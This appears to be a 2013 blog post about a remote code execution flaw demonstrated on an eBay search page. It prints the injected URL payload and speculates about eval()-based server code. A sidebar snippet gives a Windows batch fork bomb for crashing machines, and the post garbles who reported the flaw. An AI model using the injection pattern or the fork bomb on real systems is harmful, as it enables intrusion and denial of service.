Monday, December 16, 2013
Hacker demonstrated " Remote code Execution" vulnerablility
In a demo video, he exploited this RCE flaw on EBay website, and managed to display output of phpinfo() PHP function on the web page, just by modifying the URL and injecting code in that. According to an explanation on his blog, he noticed a legitimate URL on EBay: https://sea.ebay.com/search/?q=david&catidd=1 ..and modified the URL to pass any array values including a payload: https://sea.ebay.com/search/?q[0]=david&q[1]=sec{${phpinfo()}}&catidd=1 Video Demonstration: But it is not clear at this moment that where the flaw resides on Ebay server, because how a static GET parameter can be converted to accept like an array values? According to me, it is possible only if the 'search' page is receiving "q" parameter value using some LOOP function like "foreach()". Most probably code at the server end should be something like: foreach($_GET['q'] as $data) { If $data is successfully able to bypass some input filter functions { eval("execute thing here with $data"); } } Ebay already reported the flaw responsibly to the Ebay Security Team and they have patched it early this week.
Subscribe to:
Post Comments (Atom)
how to make a batch file to crash windows
here is the "code" %0|%0 paste that in a notepad and save it as whateveryou want.bat for example lol.bat by running this it...
-
Smartd0rk3r is a python script that performs dork searching and searches for local file inclusion and SQL injection errors. It is based on...
-
So I have written 100 posts in under two months I think that this is a big achievment please follow and like this post so I can continue to...
-
Kali Linux although it sounds like slang for California, Kali through the phases of the penetration testing life cycle; one major tool fr...
No comments:
Post a Comment